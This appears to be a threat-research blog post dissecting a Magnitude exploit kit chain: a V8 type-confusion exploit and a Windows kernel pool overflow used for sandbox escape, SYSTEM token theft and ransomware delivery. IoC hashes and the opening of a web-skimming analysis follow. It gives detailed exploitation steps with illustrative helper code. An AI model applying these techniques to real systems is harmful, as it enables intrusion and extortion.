It’s also important to point out that the usage of Internet Explorer (which is currently vital for the survival of exploit kits) has been steadily dropping over the past few years. This may have forced the attackers to experiment with how viable exploits for other browsers are because they know that sooner or later they will have to make the switch. But judging from these attempts, the attackers do not seem fully capable of making the switch as of now. That is some good news because it could mean that if nothing significant changes, exploit kits might be forced to retire when Internet Explorer usage drops below some critical limit.


Let’s now take a closer look at Magnitude’s exploit chain that we discovered in the wild. The exploitation starts with a JavaScript exploit for CVE-2021-21224. This is a type confusion vulnerability in V8, which allows the attacker to execute arbitrary code within a (sandboxed) Chromium renderer process. A zero-day exploit for this vulnerability (or issue 1195777, as it was known back then since no CVE ID had been assigned yet) was dumped on Github on April 14, 2021. The exploit worked for a couple of days against the latest Chrome version, until Google rushed out a patch about a week later.

It should not be surprising that Magnitude’s exploit is heavily inspired by the PoC on Github. However, while both Magnitude’s exploit and the PoC follow a very similar exploitation path, there are no matching code pieces, which suggests that the attackers didn’t resort that much to the “Copy/Paste” technique of exploit development. In fact, Magnitude’s exploit looks like a more cleaned-up and reliable version of the PoC. And since there is no obfuscation employed (the attackers probably meant to add it in later), the exploit is very easy to read and debug. There are even very self-explanatory function names, such as confusion_to_oob, addrof, and arb_write, and variable names, such as oob_array, arb_write_buffer, and oob_array_map_and_properties. The only way this could get any better for us researchers would be if the authors left a couple of helpful comments in there…

Interestingly, some parts of the exploit also seem inspired by a CTF writeup for a “pwn” challenge from *CTF 2019, in which the players were supposed to exploit a made-up vulnerability that was introduced into a fork of V8. While CVE-2021-21224 is obviously a different (and actual rather than made-up) vulnerability, many of the techniques outlined in that writeup apply to V8 exploitation in general and so are used in the later stages of Magnitude’s exploit, sometimes with the very same variable names as those used in the writeup.

The core of the exploit, triggering the vulnerability to corrupt the length of vuln_array

The root cause of the vulnerability is incorrect integer conversion during the SimplifiedLowering phase. This incorrect conversion is triggered in the exploit by the Math.max call, shown in the code snippet above. As can be seen, the exploit first calls foofunc in a loop 0x10000 times. This is to make V8 compile that function because the bug only manifests itself after JIT compilation. Then, helper["gcfunc"] gets called. The purpose of this function is just to trigger garbage collection. We tested that the exploit also works without this call, but the authors probably put it there to improve the exploit’s reliability. Then, foofunc is called one more time, this time with flagvar=true, which makes xvar=0xFFFFFFFF. Without the bug, lenvar should now evaluate to -0xFFFFFFFF and the next statement should throw a RangeError because it should not be possible to create an array with a negative length. However, because of the bug, lenvar evaluates to an unexpected value of 1. The reason for this is that the vulnerable code incorrectly converts the result of Math.max from an unsigned 32-bit integer 0xFFFFFFFF to a signed 32-bit integer -1. After constructing vuln_array, the exploit calls Array.prototype.shift on it. Under normal circumstances, this method should remove the first element from the array, so the length of vuln_array should be zero. However, because of the disparity between the actual and the predicted value of lenvar, V8 makes an incorrect optimization here and just puts the 32-bit constant 0xFFFFFFFF into Array.length (this is computed as 0-1 with an unsigned 32-bit underflow, where 0 is the predicted length and -1 signifies Array.prototype.shift decrementing Array.length). 
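The faulty conversion at the core of the bug is an ordinary two’s-complement reinterpretation. The snippet below only illustrates the arithmetic in plain JavaScript; it does not (and cannot, outside a vulnerable V8 build) trigger the bug itself:

```javascript
// The compiler bug reinterprets the unsigned 32-bit value 0xFFFFFFFF as a
// signed 32-bit integer. In two's complement, both share one bit pattern:
const x = 0xFFFFFFFF;     // 4294967295 as a JS number
const asSigned = x | 0;   // force a signed 32-bit view
console.log(asSigned);    // -1

// With lenvar mispredicted as -(-1) = 1 instead of -4294967295, the array
// construction succeeds, and the optimized shift() later computes the new
// length as 0 - 1 with unsigned 32-bit wraparound:
const wrapped = (0 - 1) >>> 0;
console.log(wrapped.toString(16)); // "ffffffff"
```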

A demonstration of how an overwrite on vuln_array can corrupt the length of oob_array

Now, the attackers have successfully crafted a JSArray with a corrupted Array.length, which allows them to perform out-of-bounds memory reads and writes. The very first out-of-bounds memory write can be seen in the last statement of the confusion_to_oob function. The exploit here writes 0xc00c to vuln_array[0x10]. This abuses the deterministic memory layout in V8 when a function creates two local arrays. Since vuln_array was created first, oob_array is located at a known offset from it in memory and so by making out-of-bounds memory accesses through vuln_array, it is possible to access both the metadata and the actual data of oob_array. In this case, the element at index 0x10 corresponds to offset 0x40, which is where Array.length of oob_array is stored. The out-of-bounds write therefore corrupts the length of oob_array, so it is now also possible to read and write past its end.

The addrof and fakeobj exploit primitives

Next, the exploit constructs the addrof and fakeobj exploit primitives. These are well-known and very powerful primitives in the world of JavaScript engine exploitation. In a nutshell, addrof leaks the address of a JavaScript object, while fakeobj creates a new, fake object at a given address. Having constructed these two primitives, the attacker can usually reuse existing techniques to get to their ultimate goal: arbitrary code execution. 

A step-by-step breakdown of the addrof primitive. Note that just the lower 32 bits of the address get leaked, while %DebugPrint returns the whole 64-bit address. In practice, this doesn’t matter because V8 compresses pointers by keeping upper 32 bits of all heap pointers constant.

Both primitives are constructed in a similar way, abusing the fact that vuln_array[0x7] and oob_array[0] point to the very same memory location. It is important to note here that vuln_array is internally represented by V8 as HOLEY_ELEMENTS, while oob_array is PACKED_DOUBLE_ELEMENTS (for more information about internal array representation in V8, please refer to this blog post by the V8 devs). This makes it possible to write an object into vuln_array and read it (or more precisely, the pointer to it) from the other end in oob_array as a double. This is exactly how addrof is implemented, as can be seen above. Once the address is read, it is converted using helper["f2ifunc"] from double representation into an integer representation, with the upper 32 bits masked out, because the double takes 64 bits, while pointers in V8 are compressed down to just 32 bits. fakeobj is implemented in the same fashion, just the other way around. First, the pointer is converted into a double using helper["i2ffunc"]. The pointer, encoded as a double, is then written into oob_array[0] and then read from vuln_array[0x7], which tricks V8 into treating it as an actual object. Note that there is no masking needed in fakeobj because the double written into oob_array is represented by more bits than the pointer read from vuln_array.
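Helpers like f2ifunc and i2ffunc are standard type-punning utilities. The usual textbook construction (which is what such helpers commonly look like, not necessarily Magnitude’s exact code) overlays a Float64Array and a BigUint64Array on one buffer:

```javascript
// Reinterpret the bits of a 64-bit double as an integer and back. Exploits
// use this to move pointers (read as doubles out of a double array) into
// integer arithmetic and back.
const buf = new ArrayBuffer(8);
const f64 = new Float64Array(buf);
const u64 = new BigUint64Array(buf);

function f2i(val) {   // double -> 64-bit integer (as BigInt)
  f64[0] = val;
  return u64[0];
}

function i2f(val) {   // 64-bit integer (BigInt) -> double
  u64[0] = val;
  return f64[0];
}

// V8 compresses heap pointers to 32 bits, hence the mask in addrof:
const low32 = f2i(1.5) & 0xFFFFFFFFn;
console.log(low32.toString(16)); // "0" (the low 32 bits of 1.5 are zero)
```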

The arbitrary read/write exploit primitives

With addrof and fakeobj in place, the exploit follows a fairly standard exploitation path, which seems heavily inspired by the aforementioned *CTF 2019 writeup. The next primitives constructed by the exploit are arbitrary read/write. To achieve these primitives, the exploit fakes a JSArray (aptly named fake in the code snippet above) in such a way that it has full control over its metadata. It can then overwrite the fake JSArray’s elements pointer, which points to the address where the actual elements of the array get stored. Corrupting the elements pointer allows the attackers to point the fake array to an arbitrary address, and it is then subsequently possible to read/write to that address through reads/writes on the fake array.

Let’s look at the implementation of the arbitrary read/write primitive in a bit more detail. The exploit first calls the get_arw function to set up the fake JSArray. This function starts by using an overread on oob_array[3] in order to leak map and properties of oob_array (remember that the original length of oob_array was 3 and that its length got corrupted earlier). The map and properties point to structures that basically describe the object type in V8. Then, a new array called point_array gets created, with the oob_array_map_and_properties value as its first element. Finally, the fake JSArray gets constructed at offset 0x20 before point_array. This offset was carefully chosen, so that the JSArray structure corresponding to fake overlaps with elements of point_array. Therefore, it is possible to control the internal members of fake by modifying the elements of point_array. Note that elements in point_array take 64 bits, while members of the JSArray structure usually only take 32 bits, so modifying one element of point_array might overwrite two members of fake at the same time. Now, it should make sense why the first element of point_array was set to oob_array_map_and_properties. The first element is at the same address where V8 would look for the map and properties of fake. By initializing it like this, fake is created to be a PACKED_DOUBLE_ELEMENTS JSArray, basically inheriting its type from oob_array.

The second element of point_array overlaps with the elements pointer and Array.length of fake. The exploit uses this for both arbitrary read and arbitrary write, first corrupting the elements pointer to point to the desired address and then reading/writing to that address through fake[0]. However, as can be seen in the exploit code above, there are some additional actions taken that are worth explaining. First of all, the exploit always makes sure that addrvar is an odd number. This is because V8 expects pointers to be tagged, with the least significant bit set. Then, there is the addition of 2<<32 to addrvar. As was explained before, the second element of point_array takes up 64 bits in memory, while the elements pointer and Array.length both take up only 32 bits. This means that a write to point_array[1] overwrites both members at once and the 2<<32 just simply sets the Array.length, which is controlled by the most significant 32 bits. Finally, there is the subtraction of 8 from addrvar. This is because the elements pointer does not point straight to the first element, but instead to a FixedDoubleArray structure, which takes up eight bytes and precedes the actual element data in memory.
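The pointer arithmetic described above can be reproduced in isolation. The following is a simplified model (with a made-up address) of how a single 64-bit write to point_array[1] simultaneously sets the 32-bit elements pointer and the 32-bit Array.length of fake:

```javascript
// Build the 64-bit value written into point_array[1]. The low 32 bits hold
// the elements pointer; the high 32 bits hold Array.length. The input
// address 0x41414140 is purely illustrative.
function makeElementsSlot(addr) {
  let addrvar = BigInt(addr);
  addrvar |= 1n;                // V8 expects tagged (odd) heap pointers
  addrvar -= 8n;                // elements points to the 8-byte
                                // FixedDoubleArray header, not element 0
  return (2n << 32n) | addrvar; // high 32 bits: Array.length = 2
}

const slot = makeElementsSlot(0x41414140);
console.log(slot.toString(16)); // "241414139"
```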

A dummy WebAssembly program that will get hollowed out and replaced by Magnitude’s shellcode

The final step taken by the exploit is converting the arbitrary read/write primitive into arbitrary code execution. For this, it uses a well-known trick that takes advantage of WebAssembly. When V8 JIT-compiles a WebAssembly function, it places the compiled code into memory pages that are both writable and executable (there now seem to be some new mitigations that aim to prevent this trick, but it is still working against V8 versions vulnerable to CVE-2021-21224). The exploit can therefore locate the code of a JIT-compiled WebAssembly function, overwrite it with its own shellcode and then call the original WebAssembly function from Javascript, which executes the shellcode planted there.

Magnitude’s exploit first creates a dummy WebAssembly module that contains a single function called main, which just returns the number 42 (the original code of this function doesn’t really matter because it will get overwritten with the shellcode anyway). Using a combination of addrof and arb_read, the exploit obtains the address where V8 JIT-compiled the function main. Interestingly, it then constructs a whole new arbitrary write primitive using an ArrayBuffer with a corrupted backing store pointer and uses this newly constructed primitive to write shellcode to the address of main. While it could theoretically use the first arbitrary write primitive to place the shellcode there, it chooses this second method, most likely because it is more reliable. It seems that the first method might crash V8 under some rare circumstances, which makes it not practical for repeated use, such as when it gets called thousands of times to write a large shellcode buffer into memory.
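For reference, a dummy module of the described shape, a single exported main that returns 42, can be assembled from raw bytes in a few lines. This reconstructs the general shape of such a module, not Magnitude’s actual bytes:

```javascript
// Minimal WebAssembly module exporting main() -> i32 42. In V8 versions
// vulnerable to CVE-2021-21224, the JIT-compiled code of such a function
// lived on writable+executable pages, which the exploit overwrites with
// shellcode before calling main() again from JavaScript.
const bytes = new Uint8Array([
  0x00, 0x61, 0x73, 0x6d, 0x01, 0x00, 0x00, 0x00,  // "\0asm", version 1
  0x01, 0x05, 0x01, 0x60, 0x00, 0x01, 0x7f,        // type section: () -> i32
  0x03, 0x02, 0x01, 0x00,                          // func 0 uses type 0
  0x07, 0x08, 0x01, 0x04, 0x6d, 0x61, 0x69, 0x6e,
  0x00, 0x00,                                      // export "main" (func 0)
  0x0a, 0x06, 0x01, 0x04, 0x00, 0x41, 0x2a, 0x0b,  // body: i32.const 42; end
]);
const instance = new WebAssembly.Instance(new WebAssembly.Module(bytes));
console.log(instance.exports.main()); // 42
```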

There are two shellcodes embedded in the exploit. The first one contains an exploit for CVE-2021-31956. This one gets executed first and its goal is to steal the SYSTEM token to elevate the privileges of the current process. After the first shellcode returns, the second shellcode gets planted inside the JIT-compiled WebAssembly function and executed. This second shellcode injects Magniber ransomware into some already running process and lets it encrypt the victim’s drives.


Let’s now turn our attention to the second exploit in the chain, which Magnitude uses to escape the Chromium sandbox. This is an exploit for CVE-2021-31956, a paged pool buffer overflow in the Windows kernel. It was discovered in June 2021 by Boris Larin from Kaspersky, who found it being used as a zero-day in the wild as a part of the PuzzleMaker attack. The Kaspersky blog post about PuzzleMaker briefly describes the vulnerability and the way the attackers chose to exploit it. However, much more information about the vulnerability can be found in a two-part blog series by Alex Plaskett from NCC Group. This blog series goes into great detail and pretty much provides a step-by-step guide on how to exploit the vulnerability. We found that the attackers behind Magnitude followed this guide very closely, even though there are certainly many other approaches that they could have chosen for exploitation. This shows yet again that publishing vulnerability research can be a double-edged sword. While the blog series certainly helped many defend against the vulnerability, it also made it much easier for the attackers to weaponize it.

The vulnerability lies in ntfs.sys, inside the function NtfsQueryEaUserEaList, which is directly reachable from the syscall NtQueryEaFile. This syscall internally allocates a temporary buffer on the paged pool (the size of which is controlled by a syscall parameter) and fills it with the NTFS Extended Attributes associated with a given file. Individual Extended Attributes are separated by a padding of up to four bytes. By making the padding start directly at the end of the allocated pool chunk, it is possible to trigger an integer underflow which results in NtfsQueryEaUserEaList writing subsequent Extended Attributes past the end of the pool chunk. The idea behind the exploit is to spray the pool so that chunks containing certain Windows Notification Facility (WNF) structures can be corrupted by the overflow. Using some WNF magic that will be explained later, the exploit gains an arbitrary read/write primitive, which it uses to steal the SYSTEM token.
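The underflow can be modeled in a few lines. The 32-bit arithmetic below is a simplified reconstruction based on the public write-ups, not the actual ntfs.sys code:

```javascript
// Simplified model: each EA entry is padded to a 4-byte boundary, and the
// remaining-space calculation is done with unsigned 32-bit arithmetic. If
// the padding starts exactly at the end of the buffer, "remaining" wraps
// around to a huge value and a naive bounds check passes.
function remainingAfterPadding(offset, bufferLength) {
  const padded = (offset + 3) & ~3;     // align offset up to 4 bytes
  return (bufferLength - padded) >>> 0; // unsigned 32-bit subtraction
}

// Entry ends 2 bytes before a 4-byte boundary, in a 0x102-byte buffer:
console.log(remainingAfterPadding(0x102, 0x102).toString(16)); // "fffffffe"
```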

The exploit starts by checking the victim’s Windows build number. Only builds 18362, 18363, 19041, and 19042 (19H1 – 20H2) are supported, and the exploit bails out if it finds itself running on a different build. The build number is then used to determine proper offsets into the _EPROCESS structure as well as to determine correct syscall numbers, because syscalls are invoked directly by the exploit, bypassing the usual syscall stubs in ntdll.

Check for the victim’s Windows build number

Next, the exploit brute-forces file handles, until it finds one on which it can use the NtSetEAFile syscall to set its NTFS Extended Attributes. Two attributes are set on this file, crafted to trigger an overflow of 0x10 bytes into the next pool chunk later when NtQueryEaFile gets called.

Specially crafted NTFS Extended Attributes, designed to cause a paged pool buffer overflow

When the specially crafted NTFS Extended Attributes are set, the exploit proceeds to spray the paged pool with _WNF_NAME_INSTANCE and _WNF_STATE_DATA structures. These structures are sprayed using the syscalls NtCreateWnfStateName and NtUpdateWnfStateData, respectively. The exploit then creates 10 000 extra _WNF_STATE_DATA structures in a row and frees every other one using NtDeleteWnfStateData. This creates holes between _WNF_STATE_DATA chunks, which are likely to get reclaimed on future pool allocations of similar size. 

With this in mind, the exploit now triggers the vulnerability using NtQueryEaFile, with a high likelihood of getting a pool chunk preceding a random _WNF_STATE_DATA chunk and thus overflowing into that chunk. If that really happens, the _WNF_STATE_DATA structure will get corrupted as shown below. However, the exploit doesn’t know which _WNF_STATE_DATA structure got corrupted, if any. To find the corrupted structure, it has to iterate over all of them and query its ChangeStamp using NtQueryWnfStateData. If the ChangeStamp contains the magic number 0xcafe, the exploit found the corrupted chunk. In case the overflow does not hit any _WNF_STATE_DATA chunk, the exploit just simply tries triggering the vulnerability again, up to 32 times. Note that in case the overflow didn’t hit a _WNF_STATE_DATA chunk, it might have corrupted a random chunk in the paged pool, which could result in a BSoD. However, during our testing of the exploit, we didn’t get any BSoDs during normal exploitation, which suggests that the pool spraying technique used by the attackers is relatively robust.

The corrupted _WNF_STATE_DATA instance. AllocatedSize and DataSize were both artificially increased, while ChangeStamp got set to an easily recognizable value.

After a successful _WNF_STATE_DATA corruption, more _WNF_NAME_INSTANCE structures get sprayed on the pool, with the idea that they will reclaim the other chunks freed by NtDeleteWnfStateData. By doing this, the attackers are trying to position a _WNF_NAME_INSTANCE chunk after the corrupted _WNF_STATE_DATA chunk in memory. To explain why they would want this, let’s first discuss what they achieved by corrupting the _WNF_STATE_DATA chunk.

The _WNF_STATE_DATA structure can be thought of as a header preceding an actual WnfStateData buffer in memory. The WnfStateData buffer can be read using the syscall NtQueryWnfStateData and written to using NtUpdateWnfStateData. _WNF_STATE_DATA.AllocatedSize determines how many bytes can be written to WnfStateData and _WNF_STATE_DATA.DataSize determines how many bytes can be read. By corrupting these two fields and setting them to a high value, the exploit gains a relative memory read/write primitive, obtaining the ability to read/write memory even after the original WnfStateData buffer. Now it should be clear why the attackers would want a _WNF_NAME_INSTANCE chunk after a corrupted _WNF_STATE_DATA chunk: they can use the overread/overwrite to have full control over a _WNF_NAME_INSTANCE structure. They just need to perform an overread and scan the overread memory for bytes 03 09 A8, which denote the start of their _WNF_NAME_INSTANCE structure. If they want to change something in this structure, they can just modify some of the overread bytes and overwrite them back using NtUpdateWnfStateData.

The exploit scans the overread memory, looking for a _WNF_NAME_INSTANCE header. 0x0903 here represents the NodeTypeCode, while 0xA8 is a preselected NodeByteSize.
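The scan itself is a plain byte-signature search. A functionally equivalent sketch, run over an ordinary byte array standing in for the overread WnfStateData (with the header planted at a made-up offset), looks like this:

```javascript
// Scan a buffer for the little-endian _WNF_NAME_INSTANCE header: the
// NodeTypeCode 0x0903 followed by the NodeByteSize 0xA8 -> bytes 03 09 A8.
function findWnfNameInstance(bytes) {
  for (let i = 0; i + 2 < bytes.length; i++) {
    if (bytes[i] === 0x03 && bytes[i + 1] === 0x09 && bytes[i + 2] === 0xa8) {
      return i; // offset of the adjacent _WNF_NAME_INSTANCE structure
    }
  }
  return -1; // overflow did not land next to one of our structures
}

// Stand-in for overread memory, with the header planted at offset 0x40:
const overread = new Uint8Array(0x100);
overread.set([0x03, 0x09, 0xa8], 0x40);
console.log(findWnfNameInstance(overread)); // 64
```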

What is so interesting about a _WNF_NAME_INSTANCE structure, that the attackers want to have full control over it? Well, first of all, at offset 0x98 there is _WNF_NAME_INSTANCE.CreatorProcess, which gives them a pointer to _EPROCESS relevant to the current process. Kaspersky reported that PuzzleMaker used a separate information disclosure vulnerability, CVE-2021-31955, to leak the _EPROCESS base address. However, the attackers behind Magnitude do not need to use a second vulnerability, because the _EPROCESS address is just there for the taking.

Another important offset is 0x58, which corresponds to _WNF_NAME_INSTANCE.StateData. As the name suggests, this is a pointer to a _WNF_STATE_DATA structure. By modifying this, the attackers can not only enlarge the WnfStateData buffer but also redirect it to an arbitrary address, which gives them an arbitrary read/write primitive. There are some constraints though, such as that the StateData pointer has to point 0x10 bytes before the address that is to be read/written and that there has to be some data there that makes sense when interpreted as a _WNF_STATE_DATA structure.

The StateData pointer gets first set to _EPROCESS+0x28, which allows the exploit to read _KPROCESS.ThreadListHead (interestingly, this value gets leaked using ChangeStamp and DataSize, not through WnfStateData). The ThreadListHead points to _KTHREAD.ThreadListEntry of the first thread, which is the current thread in the context of Chromium exploitation. By subtracting the offset of ThreadListEntry, the exploit gets the _KTHREAD base address for the current thread. 

With the base address of _KTHREAD, the exploit points StateData to _KTHREAD+0x220, which allows it to read/write up to three bytes starting from _KTHREAD+0x230. It uses this to set the byte at _KTHREAD+0x232 to zero. On the targeted Windows builds, the offset 0x232 corresponds to _KTHREAD.PreviousMode. Setting its value to SystemMode=0 tricks the kernel into believing that some of the thread’s syscalls are actually originating from the kernel. Specifically, this allows the thread to use the NtReadVirtualMemory and NtWriteVirtualMemory syscalls to perform reads and writes to the kernel address space.

The exploit corrupting _KTHREAD.PreviousMode

As was the case in the Chromium exploit, the attackers here just traded an arbitrary read/write primitive for yet another arbitrary read/write primitive. However, note that the new primitive based on PreviousMode is a significant upgrade compared to the original StateData one. Most importantly, the new primitive is free of the constraints associated with the original one. The new primitive is also more reliable because there are no longer race conditions that could potentially cause a BSoD. Not to mention that just simply calling NtWriteVirtualMemory is much faster and much less awkward than abusing multiple WNF-related syscalls to achieve the same result.

With a robust arbitrary read/write primitive in place, the exploit can finally do its thing and proceed to steal the SYSTEM token. Using the leaked _EPROCESS address from before, it finds _EPROCESS.ActiveProcessLinks, which leads to a linked list of other _EPROCESS structures. It iterates over this list until it finds the System process. Then it reads System’s _EPROCESS.Token and assigns this value (with some of the RefCnt bits masked out) to its own _EPROCESS structure. Finally, the exploit also turns off some mitigation flags in _EPROCESS.MitigationFlags.

Now, the exploit has successfully elevated privileges and can pass control to the other shellcode, which was designed to load Magniber ransomware. But before it does that, the exploit performs many cleanup actions that are necessary to avoid blue screening later on. It iterates over WNF-related structures using TemporaryNamesList from _EPROCESS.WnfContext and fixes all the _WNF_NAME_INSTANCE structures that got overflown into at the beginning of the exploit. It also attempts to fix the _POOL_HEADER of the overflown _WNF_STATE_DATA chunks. Finally, the exploit gets rid of both read/write primitives by setting _KTHREAD.PreviousMode back to UserMode=1 and using one last NtUpdateWnfStateData syscall to restore the corrupted StateData pointer back to its original value.

Fixups performed on previously corrupted _WNF_NAME_INSTANCE structures

Final Thoughts

If this isn’t the first time you’re hearing about Magnitude, you might have noticed that it often exploits vulnerabilities that were previously weaponized by APT groups, who used them as zero-days in the wild. To name a few recent examples, CVE-2021-31956 was exploited by PuzzleMaker, CVE-2021-26411 was used in a high-profile attack targeting security researchers, CVE-2020-0986 was abused in Operation Powerfall, and CVE-2019-1367 was reported to be exploited in the wild by an undisclosed threat actor (who might be DarkHotel APT according to Qihoo 360). The fact that the attackers behind Magnitude are so successful in reproducing complex exploits with no public PoCs could lead to some suspicion that they have somehow obtained under-the-counter access to private zero-day exploit samples. After all, we don’t know much about the attackers, but we do know that they are skilled exploit developers, and perhaps Magnitude is not their only source of income. But before we jump to any conclusions, we should mention that there are other, more plausible explanations for why they should prioritize vulnerabilities that were once exploited as zero-days. First, APT groups usually know what they are doing[citation needed]. If an APT group decides that a vulnerability is worth exploiting in the wild, that generally means that the vulnerability is reliably weaponizable. In a way, the attackers behind Magnitude could abuse this to let the APT groups do the hard work of selecting high-quality vulnerabilities for them. Second, zero-days in the wild usually attract a lot of research attention, which means that there are often detailed writeups that analyze the vulnerability’s root cause and speculate about how it could get exploited. These writeups make exploit development a lot easier compared to more obscure vulnerabilities which attracted only a limited amount of research.

As we’ve shown in this blog post, both Magnitude and Underminer managed to successfully develop exploit chains for Chromium on Windows. However, none of the exploit chains were particularly successful in terms of the number of exploited victims. So what does this mean for the future of exploit kits? We believe that unless some new, hard-to-patch vulnerability comes up, exploit kits are not something that the average Google Chrome user should have to worry about much. After all, it has to be acknowledged that Google does a great job at patching and reducing the browser’s attack surface. Unfortunately, the same cannot be said for all other Chromium-based browsers. We found that a big portion of those that we protected from Underminer were running Chromium forks that were months (or even years) behind on patching. Because of this, we recommend avoiding Chromium forks that are slow in applying security patches from the upstream. Also note that some Chromium forks might have vulnerabilities in their own custom codebase. But as long as the number of users running the vulnerable forks is relatively low, exploit kit developers will probably not even bother with implementing exploits specific just for them.

Finally, we should also mention that it is not entirely impossible for exploit kits to attack using zero-day or n-day exploits. If that were to happen, the attackers would probably carry out a massive burst of malvertising or watering hole campaigns. In such a scenario, even regular Google Chrome users would be at risk. The damage done by such an attack could be enormous, depending on the reaction time of browser developers, ad networks, security companies, LEAs, and other concerned parties. There are basically three ways that the attackers could get their hands on a zero-day exploit: they could either buy it, discover it themselves, or discover it being used by some other threat actor. Fortunately, using some simple math we can see that the campaign would have to be very successful if the attackers wanted to recover the cost of the zero-day, which is likely to discourage most of them. Regarding n-day exploitation, it all boils down to a race if the attackers can develop a working exploit sooner than a patch gets written and rolled out to the end users. It’s a hard race to win for the attackers, but it has been won before. We know of at least two cases when an n-day exploit working against the latest Google Chrome version was dumped on GitHub (this probably doesn’t need to be written down, but dumping such exploits on GitHub is not a very bright idea). Fortunately, these were just renderer exploits and there were no accompanying sandbox escape exploits (which would be needed for full weaponization). But if it is possible to win the race for one exploit, it’s not unthinkable that an attacker could win it for two exploits at the same time.
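To make the “simple math” above concrete, here is a back-of-the-envelope calculation. Every number in it is a hypothetical assumption chosen only to show the shape of the argument; real exploit prices and payment rates are unknown:

```javascript
// Entirely hypothetical numbers -- only the structure of the estimate matters.
const zeroDayChainCost = 1_000_000; // assumed price of a full Chrome chain, USD
const revenuePerVictim = 1_000;     // assumed average ransom collected
const payRate = 0.05;               // assumed fraction of victims who pay

// Victims that must be successfully exploited just to break even,
// before even counting the cost of malvertising:
const victimsNeeded = zeroDayChainCost / (revenuePerVictim * payRate);
console.log(victimsNeeded); // 20000
```

Given how quickly Chrome patches propagate, reaching tens of thousands of still-vulnerable victims within the exploit’s short lifetime is a tall order, which is the point being made above.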

Indicators of Compromise (IoCs)

SHA-256 Note
71179e5677cbdfd8ab85507f90d403afb747fba0e2188b15bd70aac3144ae61a CVE-2021-21224 exploit
a7135b92fc8072d0ad9a4d36e81a6b6b78f1528558ef0b19cb51502b50cffe6d CVE-2021-21224 exploit
6c7ae2c24eaeed1cac0a35101498d87c914c262f2e0c2cd9350237929d3e1191 CVE-2021-31956 exploit
8c52d4a8f76e1604911cff7f6618ffaba330324490156a464a8ceaf9b590b40a payload injector
8ff658257649703ee3226c1748bbe9a2d5ab19f9ea640c52fc7d801744299676 payload injector
SHA-256 Note
2ac255e1e7a93e6709de3bbefbc4e7955af44dbc6f977b60618237282b1fb970 CVE-2021-21224 exploit
9552e0819f24deeea876ba3e7d5eff2d215ce0d3e1f043095a6b1db70327a3d2 HiddenBee loader
7a3ba9b9905f3e59e99b107e329980ea1c562a5522f5c8f362340473ebf2ac6d HiddenBee module container
2595f4607fad7be0a36cb328345a18f344be0c89ab2f98d1828d4154d68365f8 amd64/coredll.bin
ed7e6318efa905f71614987942a94df56fd0e17c63d035738daf97895e8182ab amd64/pcs.bin
c2c51aa8317286c79c4d012952015c382420e4d9049914c367d6e72d81185494 CVE-2019-0808 exploit
d88371c41fc25c723b4706719090f5c8b93aad30f762f62f2afcd09dd3089169 CVE-2020-1020 exploit
b201fd9a3622aff0b0d64e829c9d838b5f150a9b20a600e087602b5cdb11e7d3 CVE-2020-1054 exploit

The post Exploit Kits vs. Google Chrome appeared first on Avast Threat Labs.

Web Skimming Attacks Using Google Tag Manager

24 January 2022 at 14:00

E-commerce websites are much more popular than they used to be, as people shop online more and more often. This has led to the growth of an attack type called web skimming, in which an attacker inserts malicious code into a legitimate e-commerce website. One of the most targeted e-commerce platforms is Magento, which is popular among attackers because it is known for many vulnerabilities. However, this doesn't mean that other platforms aren't being targeted; for example, sites using WooCommerce have also been victims.

In this post, we go over what web skimming attacks are and how they work. We then analyze a series of web skimming attacks we found, active from March 2021 to the present, which abused Google Tag Manager and mainly targeted sites in Argentina and Saudi Arabia.

Overview of Web Skimming Attacks

The purpose of malicious web skimming code is to steal the payment details of a website's customers. The attack can be compared to an attack on physical ATMs, except that instead of hardware skimmers, malicious code is used to steal payment card information.

Web skimming is dangerous because the customer often has no way of knowing that a website has been compromised. Mostly, the attackers go after small e-commerce websites with poor security, but sometimes even a big e-commerce site can become a victim. In 2018, the British Airways website was infected by a web skimming attack. In 2019, forbesmagazine[.]com was infected and payment details were sent to fontsawesome[.]gq. Later, in 2020, wishtrend[.]com, a big online retailer selling beauty products, also became a victim of a web skimming attack. In 2021, another big e-commerce website, store.segway[.]com, was infected with a skimming attack.

We observed that wishtrend[.]com (which has more than 1M followers on Facebook) was infected with web skimming in 2020. Later, in 2021, the same website was infected with a phishing attack that imitated a Dropbox login.

How Web Skimming Attacks Work Under the Hood

A website can be breached and compromised both on the client side and on the server side. From the AV perspective, as we protect the end customers (clients) and have no visibility into the server side, we focus on the client side. There can either be a single piece of malicious code hidden in the infected website, or, more often, the attack can be split into two or more stages. The first stage is a simple loader inserted into an infected website's HTML or into an already existing JavaScript file. It can look like the code in the image below.

First stage of web skimming attack, example of malicious code inserted in websites

This code loads additional malicious code, sometimes obfuscated, sometimes not, from an attacker's domain. For the second stage, attackers usually use typosquatting domains to hide and pose as a legitimate service. The malicious code reads the data from all (or in some cases specific) input forms and sends it to the attacker's server.

To get the payment details, the attackers use one of the following techniques:

  • Stealing payment details directly from the original payment form
  • Inserting malicious payment form (used in cases when no form exists)
  • Redirecting to a malicious form on another website (can be placed on infected website or also on attacker’s website) 

The image below shows an example of a fake payment form in the red box. It is almost impossible to recognize that something is wrong, because on some e-commerce websites the payment form looks exactly the same and is valid. In this case, however, there is a small clue in the yellow box: "You will be redirected to the Realex website when you place an order." If a website states that you will be redirected, the payment form should not appear directly on the e-commerce website; the user should expect to be redirected to the payment gateway (a different website) to enter their payment details.

Example of a malicious payment form on an infected website

The second stage of a web skimming attack (the part responsible for stealing payment details and sending them to the attacker) can take more than one form; the code snippet below shows an example. Here the attackers use a POST request to exfiltrate payment details, but they can also use GET requests and WebSockets.

Example of web skimming code

Stolen payment details are usually sold on the dark web. Credit card datasets that come from web skimming attacks are usually fresh and can therefore be sold at a higher price than, for example, data stolen from databases, which is often old. More information about selling stolen cards can be found in Yonathan Klijnsma's VB2019 paper: Inside Magecart: the history behind the covert card-skimming assault on the e-commerce industry.

Web Skimming using Google Tag Manager

In Q3 2021 we discovered a web skimming attack that uses Google Tag Manager (GTM) as a first stage. First, the infected webpage loads a script from googletagmanager[.]com/gtm.js?id=gtm-<code> via a script injected into the HTML file, shown in the image below.

Code snippet from index.html on infected e-commerce website

There is nothing unusual in this behaviour; many websites use Google Tag Manager, and it looks exactly the same (although it can be suspicious when a website loads more than one GTM script). But if we look closer at the gtm.js file, we can find suspicious code in it. The image below compares the malicious and clean GTM scripts. The malicious file contains added custom code that loads another JavaScript file from ganalitis[.]com. This abuses a feature of GTM: it is possible to add a custom script, which is then loaded from a domain.

Difference between usual and malicious GTM code

Based on a common signature and shared IP addresses, we were able to connect ganalitis[.]com with similar domains from the same attacker (data from RiskIQ).

Domain Active from IP
ganalitics[.]com 2021-06-03 193[.]203[.]203[.]240
